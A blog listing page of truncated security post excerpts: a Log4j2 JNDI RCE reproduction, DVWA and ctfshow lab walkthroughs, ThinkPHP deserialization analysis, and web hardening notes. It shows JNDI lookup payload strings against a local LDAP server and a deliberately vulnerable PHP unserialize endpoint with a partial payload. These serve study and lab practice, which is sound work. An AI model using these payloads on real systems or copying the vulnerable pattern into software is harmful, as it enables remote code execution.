[vulnerability] log4j2 remote code execution and actual code reproduction
Vulnerability principle
1. The attack disguises a request body containing JNDI executable services. Here I mainly try LDAP and RMI. The request URL is as follows:
LADP: ${jndi:ldap://127.0.0.1:1389/hello}RMI: ${jndi:ldap://127.0.0.1:1389/hello}
2. When the application happens to output the request header or input parameter log, it will ...
Posted by dominod on Sat, 11 Dec 2021 10:13:56 +0100
DVWA level 8: SQL Injection (Blind)
catalogue
Low
Medium
High
Impossible
SQL Injection (blind), that is, SQL blind injection, is different from general injection in that the general injection attacker can directly see the execution result of the injection statement from the page, while during blind injection, the attacker usually cannot obtain the execution result from the ...
Posted by dmcke5 on Wed, 08 Dec 2021 21:11:46 +0100
DVWA Level 6: Insecure CAPTCHA (Insecure Authentication Code)
Catalog
Low
Medium
High
Impossible
Insecure CAPTCHA, which means unsafe authentication code, is short for Completely Automated Public Turing Test to Tell Computers and Humans Apart, a Turing test that automatically distinguishes computers from humans. However, I think it would be better to call the content of this module an unsafe verif ...
Posted by coollog on Tue, 07 Dec 2021 19:15:47 +0100
Ganwangbei 2021 CTF---Misc&WebWriteup
preface
How to evaluate the 2021 dai Lian cup?, My evaluation is "immortals fight, mortals suffer".
Misc
Misc1-decodemaster
After getting the title, open the word file and find that it is a string of random codes with the font of Wingdings 2 Modify the font and find that the font can be displayed normally when it is in bold ( ...
Posted by 9902468 on Tue, 07 Dec 2021 10:46:33 +0100
Implementation of springboot web application security policy
background
Recently, the project has been launched, and Party A requires to pass the safety inspection before acceptance. Therefore, a series of safety reinforcement has been carried out for the system according to the scanning results. This paper introduces some common safety problems and protection strategies, and provides corresponding solut ...
Posted by dcf1023 on Sun, 05 Dec 2021 00:50:33 +0100
ThinkPHP5.0.24_ Analysis of deserialization vulnerability in Linux
ThinkPHP5.0.24_ Analysis of deserialization vulnerability in Linux
ThinkPHP5.0.24Vulnerability code<?php
namespace app\index\controller;
class Index
{
public function test01(){
$code = $_POST['code'];
unserialize(base64_decode($code));
}
}
payload/index.php/index/index/test01
POST
code=TzoyNzoidGhpbmtccHJvY2Vzc1xwa ...
Posted by trevorturtle on Mon, 22 Nov 2021 06:40:53 +0100
Problems of PHP high-end factory
Summary seen by boss
General PHP interviews will ask about front-end knowledge, especially VUE. You need to know some front-end content
PHP:
What are CSRF and XSS attacks
answer:
1.CSRF Basic concept, abbreviation and full name of
CSRF(Cross-site request forgery) Cross-site request forgery
2.CSRF Attack principle of
User is a website A ...
Posted by ubaldc36 on Sat, 20 Nov 2021 08:55:56 +0100
Introduction to ctfshow Web - deserialization (previous)
catalogue
web254
web255
web256
web257
web258
web259
web260
web261
web262
web263
web264
web265
web266
web267
web254
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-02 17:44:47
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
...
Posted by LucienFB on Sun, 24 Oct 2021 12:24:58 +0200
Springboot web project uses TrueLicense to realize software authentication and license - server side
1, Introduction to License
License is the copyright license, which is generally used for the access license certificate provided by the charging software to the paying user. According to different application deployment locations, it can be divided into the following two situations:
The application is deployed on the developer's own ECs. In ...
Posted by PHPGuru_2700 on Tue, 12 Oct 2021 23:56:58 +0200
On cross domain vulnerabilities of JSONP
On cross domain vulnerabilities of JSONP
CSRF (Cross site request forgery) is an attack method that hijacks the user to perform unintentional operations on the currently logged in Web application. Compared with XSS, XSS uses the trust of the website to the user, and CSRF uses the trust of the website to the user's Web browser.
When it comes t ...
Posted by ash4u on Tue, 12 Oct 2021 02:12:01 +0200